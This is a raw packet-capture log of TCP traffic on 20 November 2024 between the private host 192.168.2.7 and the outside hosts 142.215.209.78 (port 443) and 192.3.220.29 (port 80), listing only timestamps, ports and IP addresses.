                                                                                                          Nov 20, 2024 17:18:26.110310078 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112276077 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112320900 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112339020 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.112350941 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112365961 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.115962982 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.116058111 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.116066933 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.118648052 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.118726969 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.118735075 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.121560097 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.121628046 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.121637106 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.125231028 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.125313044 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.125322104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.127954960 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.128068924 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.128077984 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.130693913 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.130790949 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.130800009 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.134247065 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.134334087 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.134346008 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.137835026 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.137927055 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.137934923 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.141096115 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.141222000 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.141232967 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.143233061 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.143326044 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.143332958 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.146545887 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.146622896 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.146632910 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.149816990 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.149900913 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.149915934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.152278900 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.152374983 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.152384043 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.155729055 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.155829906 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.155837059 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.203258991 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.313267946 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.313280106 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.313368082 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.313415051 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.316008091 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.316018105 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.316107988 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.316128969 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319353104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319391012 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319432020 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.319453955 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319478035 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.322191954 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.322278976 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.322294950 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.325790882 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.325871944 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.325887918 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.327665091 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.327734947 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.327749014 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.329356909 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.329447031 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.329459906 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.332926035 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.333081961 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.333093882 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.335700989 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.335787058 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.335799932 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.338323116 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.338402987 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.338416100 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.341909885 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.341991901 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.342005968 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.345129967 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.345212936 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.345227003 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.347904921 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.348088980 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.348110914 CET44349713142.215.209.78192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 20, 2024 17:18:26.350863934 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.350959063 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.350970984 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.354449034 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.354532003 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.354545116 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.357100964 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.357176065 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.357187986 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.406383991 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.513145924 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.513178110 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.513243914 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.513295889 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.513305902 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.516016006 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.516058922 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.516088963 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.516100883 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.516119003 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.518902063 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.518970013 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.518980980 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.521755934 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.521848917 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.521858931 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.525151968 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.525226116 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.525235891 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.528099060 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.528177977 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.528188944 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.530678988 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.530781031 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.530788898 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.534384012 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.534466982 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.534477949 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.537152052 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.537224054 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.537235022 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.540713072 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.540783882 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.540792942 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.543178082 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.543262005 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.543272972 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.546578884 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.546766043 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.546799898 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.549489975 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.549571991 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.549592018 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.552345991 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.552405119 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.552424908 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.552457094 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.555694103 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.555758953 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.555773020 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.558626890 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.558705091 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.558718920 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.609533072 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.714483976 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.714517117 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.714581013 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.714624882 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.714644909 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.717212915 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.717257023 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.717294931 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.717314959 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.717345953 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.720310926 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.720391035 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.720422983 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.723619938 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.723702908 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.723733902 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.727260113 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.727358103 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.727374077 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.730125904 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.730210066 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.730223894 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.735076904 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.735160112 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.735177994 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.737062931 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.737147093 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.737162113 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.739198923 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.739288092 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.739301920 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.741836071 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.741919994 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.741934061 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.745109081 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.745183945 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.745198965 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.748565912 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.748642921 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.748656988 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.750566959 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.750634909 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.750655890 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.754174948 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.755049944 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.755064964 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.757271051 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.757358074 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.757390976 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.760549068 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.760629892 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.760663033 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.812628984 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.918975115 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.919006109 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.919081926 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.919125080 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.919141054 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.921910048 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.921974897 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.922054052 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.922071934 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925390005 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925437927 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925461054 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.925477028 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925507069 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.925524950 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925550938 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925589085 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.925610065 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.925633907 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.927896023 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.927980900 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.927997112 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.928051949 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.928097963 CET  443          49713      142.215.209.78  192.168.2.7
Nov 20, 2024 17:18:26.928150892 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:26.930804968 CET  49713        443        192.168.2.7     142.215.209.78
Nov 20, 2024 17:18:44.005593061 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:44.187542915 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:44.187637091 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:44.187983036 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:44.307574987 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308274031 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308440924 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308454990 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308470011 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308486938 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308501959 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308516979 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308532000 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308578968 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.308590889 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308609009 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.308715105 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.430066109 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.430208921 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.430288076 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.434246063 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.484601974 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.498064995 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.498226881 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.498286009 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.500405073 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.500585079 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.500637054 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.509012938 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.509031057 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.509078026 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.517292023 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.517477989 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.517529964 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.525767088 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.526113987 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.526170969 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.534275055 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.534430027 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.534492970 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.540684938 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.540848970 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.540910006 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.549242020 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.549460888 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.549518108 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.557451963 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.559675932 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.559730053 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.565881014 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.565918922 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.565984011 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.604346037 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.604800940 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.604882956 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.608417988 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.656485081 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.690958977 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.690980911 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.691153049 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.694156885 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.694360971 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.694437027 CET  49765        80         192.168.2.7     192.3.220.29
Nov 20, 2024 17:18:45.698384047 CET  80           49765      192.3.220.29    192.168.2.7
Nov 20, 2024 17:18:45.698402882 CET  80           49765      192.3.220.29    192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.698462963 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.702375889 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.702394009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.702464104 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.709373951 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.709515095 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.709568024 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.713248014 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.713447094 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.713504076 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.714020014 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.714704990 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.714761019 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.718712091 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.719037056 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.719094038 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.723334074 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.723479986 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.723644972 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.728043079 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.728080988 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.728146076 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.732275009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.732386112 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.732525110 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.736888885 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.737627983 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.737690926 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:45.741611004 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.741959095 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:45.742017984 CET4976580192.168.2.7192.3.220.29
